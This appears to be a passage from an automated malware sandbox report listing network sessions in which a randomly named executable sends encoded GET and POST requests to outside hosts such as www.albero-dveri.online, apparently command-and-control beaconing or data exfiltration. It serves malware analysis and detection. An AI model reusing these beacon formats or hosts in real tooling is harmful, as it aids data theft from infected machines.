                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/sVavjvzYt0wi3n41OrA6nAK+Np+wAfAx93u5MbdkFr5VbJmcTeWor6g1Gou+SXSQIkt/8m+KYxgFAuJpcEp+pl+9F4xC7SBpfDgmyJqfy6y9pRB02xBS6kgJnIOpAxSuxX6pFSWYS1XCzZNMtLId3Vkyz5KxoVnbwHbKB8FmGQj1fWHfuATFF+BAf+yWomXiOfWv+wcP1J7JwjH9a82waCvQxhijt+ZUM3xxPEzGPI3QzIZBZ7f45DbzmE6DQnRRQBODQaBxvVA46RfsojREeyaYEdFsL90keHRf8hLqgoJzXY3RXTNN/yv1Gf95U+wUH/eKLrGV3z6ja0bZSGnIaoyNsfHIYlNvaUWPca5qh0J2EY5lGSTkhnOCt7mkdUUO+
                                                                                  Sep 25, 2024 09:56:13.890372038 CEST5156OUTData Raw: 45 30 6d 36 62 46 6b 64 64 38 32 31 54 74 74 33 4b 37 72 75 45 42 4e 4b 56 76 58 55 61 41 53 44 41 58 70 53 4c 31 55 34 52 59 69 2f 33 6d 38 66 4b 2b 70 37 52 2f 6c 39 78 4a 49 43 64 6b 71 31 68 31 4e 4e 7a 35 41 57 33 54 4d 2b 51 59 52 54 32 4b
                                                                                  Data Ascii: E0m6bFkdd821Ttt3K7ruEBNKVvXUaASDAXpSL1U4RYi/3m8fK+p7R/l9xJICdkq1h1NNz5AW3TM+QYRT2Ky0nSq1jIs1a2ml/3x2h0ch8HUw+0vvJ6FwW1ISvdTyUK8JHqBuVXE8hcDIY54rTxfccaRYyyBbI59ec3Kwvd+2UmgldEua9dfIQn/pZumElQei9JlFoJj5xlaAer1tJXSXbzBXVHZl5q7gtk1ptbXv3BBSxm9rpJc
                                                                                  Sep 25, 2024 09:56:13.890443087 CEST1522OUTData Raw: 53 6e 63 77 2b 50 4f 63 71 57 72 55 31 70 38 7a 48 59 54 4a 6d 72 2f 47 71 56 50 44 71 6d 46 53 6f 6c 42 43 7a 4b 31 6a 33 56 32 57 76 61 5a 38 2f 63 62 63 2f 69 50 72 79 34 36 36 30 42 44 6d 46 45 63 38 51 70 75 44 51 37 70 41 5a 49 37 39 66 47
                                                                                  Data Ascii: Sncw+POcqWrU1p8zHYTJmr/GqVPDqmFSolBCzK1j3V2WvaZ8/cbc/iPry4660BDmFEc8QpuDQ7pAZI79fGJBZ4W8B3CuVy1KBkxoypGM24lKuYz65OmBTWrfIxsEoKahaxQJliyckueXUcJ+HQ0KFzaxUEd9mVGpU3wSQscAknfLrGY1pCszJLq/7aexLlnoAjanT74e9LavE9nDnB4PW905/MMzqi2B4m4JqX+maUxt2OKkjMf
                                                                                  Sep 25, 2024 09:56:14.071858883 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:39 GMT
                                                                                  X-Varnish: 1105030363
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.11.204977754.67.87.110803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:16.607481956 CEST542OUTGET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:16.778028011 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:42 GMT
                                                                                  X-Varnish: 1105030372
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.11.2049778194.58.112.174803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:22.387228012 CEST831OUTPOST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                  Sep 25, 2024 09:56:22.618781090 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:22 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                  Sep 25, 2024 09:56:22.618799925 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                  Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
                                                                                  Sep 25, 2024 09:56:22.618907928 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                  Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.11.2049779194.58.112.174803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:25.166872025 CEST851OUTPOST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 39 50 49 39 79 53 65 56 46 4c 79 52 55 75 50 4f 79 61 79 56 72 68 44 78 4c 47 58 66 75 32 38 44 71 37 42 67 62 42 54 39 6e 66 75 2f 7a 63 52 52 30 4f 55 4a 2f 63 7a 43 51 61 74 55 45 74 2f 4a 69 55 2b 2f 75 6c 70 4f 50 55 45 66 54 68 43 46 36 4a 71 58 63 39 33 52 31 38 73 44 34 6d 38 38 42 51 75 73 44 32 68 39 4f 73 76 57 4f 66 59 59 5a 4e 68 36 53 76 4a 6f 7a 33 31 6b 70 71 4e 6c 43 6d 63 6b 37 63 58 31 59 4a 6a 37 50 35 58 47 42 33 4e 41 7a 38 2b 77 66 4e 32 47 7a 69 39 79 49 77 69 57 62 30 71 57 31 57 41 62 49 3d
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
                                                                                  Sep 25, 2024 09:56:25.400648117 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:25 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                  Sep 25, 2024 09:56:25.400834084 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                  Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41
                                                                                  Sep 25, 2024 09:56:25.401263952 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                  Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.11.2049780194.58.112.174803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:27.938630104 CEST2578OUTPOST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 31 50 49 4c 6d 53 64 79 5a 4c 39 78 55 75 4d 4f 79 5a 79 56 72 34 44 79 37 61 58 66 69 4d 38 42 53 37 54 79 54 42 57 49 4c 66 6b 2f 7a 63 4f 42 30 50 4b 35 2f 4e 7a 42 34 57 74 55 55 74 2f 4a 69 55 2b 38 32 6c 74 61 62 55 47 66 54 6d 42 46 36 7a 39 6e 63 56 33 58 64 47 73 43 4d 59 39 4d 68 51 76 4d 54 32 79 34 69 73 33 47 4f 5a 4d 34 59 59 68 36 4f 77 4a 6f 76 37 31 6e 31 4d 4e 6d 79 6d 63 41 75 6a 43 6e 41 41 79 49 4b 77 4b 46 6c 49 42 77 2f 43 68 69 48 58 2b 6b 54 50 79 32 6f 37 68 51 50 38 77 33 77 55 62 66 4c 70 4b 48 79 7a 34 52 55 6e 34 74 38 6f 2b 63 59 58 6c 36 36 58 6f 4b 34 79 34 44 69 74 64 55 2b 78 6d 63 49 34 59 4d 30 6c 4f 65 32 39 50 55 71 67 4a 78 51 58 6f 70 71 39 47 44 38 5a 65 4d 58 45 4d 62 77 7a 66 47 42 6e 31 6b 65 75 2f 76 4e 6f 35 76 69 54 57 50 54 75 5a 4f 6e 66 77 78 63 71 73 41 6f 6c 57 53 46 48 46 62 63 4e 44 31 7a 50 45 41 38 46 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a1PILmSdyZL9xUuMOyZyVr4Dy7aXfiM8BS7TyTBWILfk/zcOB0PK5/NzB4WtUUt/JiU+82ltabUGfTmBF6z9ncV3XdGsCMY9MhQvMT2y4is3GOZM4YYh6OwJov71n1MNmymcAujCnAAyIKwKFlIBw/ChiHX+kTPy2o7hQP8w3wUbfLpKHyz4RUn4t8o+cYXl66XoK4y4DitdU+xmcI4YM0lOe29PUqgJxQXopq9GD8ZeMXEMbwzfGBn1keu/vNo5viTWPTuZOnfwxcqsAolWSFHFbcND1zPEA8FiH19J5Z7HfAUTMhc1vFEWJ3MYkSj9JZYvyYFZxBd6OTHAlXO+ORDarI6LgKlZfv5mPgHqbhd3He2yn05UjLGvv02FPgcnsFBIBvBjB1y+dKgYI0SxM7qU1Bqg4gcI7tnvH7WZDWrB4lqVUWARZPaVlouA1yBPDFSNbi5crf+Z8+Y98wi6t5tDoyBtB4XJ/VUz+4Yjv3v3x4AbVea8mhzb2chqbBuSRTRVp6a2TG3Wqw+jMm4E6bK+lZQZDimljHuJ0sDh7T/Bn24sHLDR2QRuwt3gWsmfSz5seHRa4Kzb4F8Eibm4aEk0FmyTNqCrAHPc+Z4FITeuBrjbLpZlmizjT9kajfvzqEUWsAtbnqLDpHhfvNX1wMqP+z69sRtNadpT7PrUM678NzwMdlI/vRJ2Tnm+UZ08+X8bG2n8aFCOACOeoJk4D+iBSQ3tk2ZuABMgGCyWPWpn6iS4XUdigKlDyyvLoQUgU70ccuxUuML/i8Tas1w/ruEC3qwIILCvYM27Yy+1XynijvIOtPBGnAt5wvGdI+uLqzDi21yOAIfLw4m5xoOCgU8lZkBZYNkvLr5HFX0Ys6sCIwn2b5Wszn6z7KM5GoVEEPlsqsAyoVS7rrIr3Eonou3WHJwnJfeUn156z4EQ+gU9aFKhdjTG1I+zZhAqLB0wgbFD+ [TRUNCATED]
                                                                                  Sep 25, 2024 09:56:27.938663006 CEST3867OUTData Raw: 56 55 78 32 65 72 52 6b 68 77 2f 4b 49 44 63 6f 49 69 70 59 59 44 6f 39 6c 51 32 6a 53 44 75 79 75 4a 2b 36 43 35 71 54 6d 35 6e 55 36 71 71 33 68 30 39 74 65 31 63 4a 70 30 45 66 4b 69 48 78 52 2b 65 76 7a 4e 2f 7a 54 79 49 4c 4a 71 38 61 78 42
                                                                                  Data Ascii: VUx2erRkhw/KIDcoIipYYDo9lQ2jSDuyuJ+6C5qTm5nU6qq3h09te1cJp0EfKiHxR+evzN/zTyILJq8axBr2GLLAzMcsxWGSICbYg7nXTMy8J+943Lx3AzJ/a3CnfmscaGNWhTPJk/ppAJX5yR3XSXg+7BGvwOEtJg1lY7IabvTjG68FETYc8T8YvQ/W7Z/y25GfM5BhuW32GMceD/vbckzmZXyWfeuAx9uBSZ9UKXSVSU7wHqY
                                                                                  Sep 25, 2024 09:56:28.168648005 CEST1555OUTData Raw: 74 43 56 61 6c 43 68 4a 59 74 71 35 37 4f 68 34 74 35 41 75 62 72 2f 4f 47 42 38 61 49 46 67 2b 36 66 35 2f 59 75 63 36 34 4c 5a 64 42 64 6d 6a 5a 48 70 2f 36 71 46 4d 45 43 6d 61 57 4c 6b 54 4b 52 61 59 36 76 53 31 76 2b 44 37 47 32 5a 6d 71 4b
                                                                                  Data Ascii: tCValChJYtq57Oh4t5Aubr/OGB8aIFg+6f5/Yuc64LZdBdmjZHp/6qFMECmaWLkTKRaY6vS1v+D7G2ZmqK9VVc+JFfm3l+T+pYYtxfS0xBTdO3P1+rlGDpa3V4K/q+TlQYPEr75OPw/DzyUm5zWfSwgvKQl7Y2xrvQdf6k9jLYhp+PruIkcjH0/IB8dezwYFT8UZBj/4luiI7b/84CpIEuSmMkfVTYwIN5NqkGZBkF/8cMD6nlh
                                                                                  Sep 25, 2024 09:56:28.173904896 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                  Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
